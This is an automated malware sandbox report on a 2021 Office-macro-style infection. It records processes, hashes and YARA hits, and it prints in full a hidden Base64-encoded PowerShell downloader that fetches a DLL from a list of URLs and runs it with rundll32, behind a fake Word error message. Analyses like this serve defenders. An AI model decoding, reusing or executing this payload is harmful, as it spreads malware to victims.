BsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA==
                                            Imagebase:0x4a020000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:23:17:40
                                            Start date:01/02/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xffd30000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:23:17:40
                                            Start date:01/02/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA==
                                            Imagebase:0x13f440000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.2110752047.00000000002D6000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.2111601657.0000000001C34000.00000004.00000040.sdmp, Author: Florian Roth
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >